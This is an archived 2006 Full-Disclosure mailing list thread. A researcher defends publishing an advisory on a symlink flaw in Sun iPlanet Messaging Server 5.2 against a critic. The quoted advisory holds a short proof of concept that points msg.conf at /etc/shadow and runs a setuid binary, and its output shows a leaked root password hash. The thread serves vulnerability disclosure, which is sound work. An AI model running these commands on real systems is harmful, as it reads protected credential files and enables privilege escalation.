RE: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root password compromise]

["php0t" <very () unprivate com>]

  Excuse me, but what have I done to you?

And why am I only supposed to disclose bugs when somebody pays me for it
?

Can you please explain your rant, so next time I can do -whatever-
different?

And by the way, I'm not 'trying to prove I can find holes', I didn't
spend any time trying to
find a hole in this specific software, I just happened to stumble upon
it in the process
of trying to gain root - after which I decided to disclose this silly
and obvious bug.

So I ask again, is this a problem for you? Am I being ignorant / evil
for posting this vuln?
Just tell me what's up - If your problem is that I do not get paid for
this - well - I am happy
that you are so much after what's best for me but I can do fine on my
own - thanks.

  php0t / zorro.hu



> You are wasting your time trying to prove you can find holes in
software that you AREN'T *PAID FOR* FINDING BUGS.
> Nice advisory, though.  you spend time on it.

> Sincerely,
> T.Solo


php0t wrote:
> Summary
> ----------------
> Date: 14 Jun 2006
> Vendor: Sun Microsystems, Inc.
> Name: iPlanet Messaging Server
> Version: 5.2 HotFix 1.16 (built May 14 2003)
> Vuln: msg.conf symlink attack
> Severity: high
>
>
> Software description
> ----------------
> The iPlanet Messaging Server is a software product that provides a 
> centralized location for the exchange of information through the 
> sending and receiving of messages. The product is designed for 
> telecommunications providers, service providers, and enterprises that 
> offer messaging capabilities to employees, partners, and customers. 
> The iPlanet Messaging Server delivers a Web-based messaging platform 
> capable of serving tens of millions of users, and also provides 
> value-added differentiated services, including outsourcing, wireless 
> ,and unified messaging services.
>
>   
> Vulnerability desciption
> ----------------
> Setuid programs part of the iPlanet Messaging Server try to read the 
> configuration file msg.conf. If the environment variable CONFIGROOT is

> set, the configuration is read from that directory.
> A symlink attack is possible, and as a result it is possible to read
the
> first line of any file with uid=0.
>
>
> Example
> ----------------
> test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
> iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) 
> libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) SunOS sunbox 
> 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris
> test@sunbox:/tmp$ 
> test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> -rws--s--x    1 root     mail       446864 Sep 22  2005
> /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> test@sunbox:/tmp$ 
> test@sunbox:/tmp$ ln -s /etc/shadow msg.conf
> test@sunbox:/tmp$ 
> test@sunbox:/tmp$ export CONFIGROOT=.
> test@sunbox:/tmp$ 
> test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> [14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error:
> func=_configdrv_file_readoption; error=option name should be followed
by
> '='; line=root:qW1HFEa1MCD0w:11821::::::
> ERROR: Configuration database initialization failed - see default
> logfile
> test@sunbox:/tmp$ 
>
>
> Vulnerable
> ----------------
> iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
>
> php0t / zorro.hu
> www.zorro.hu
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/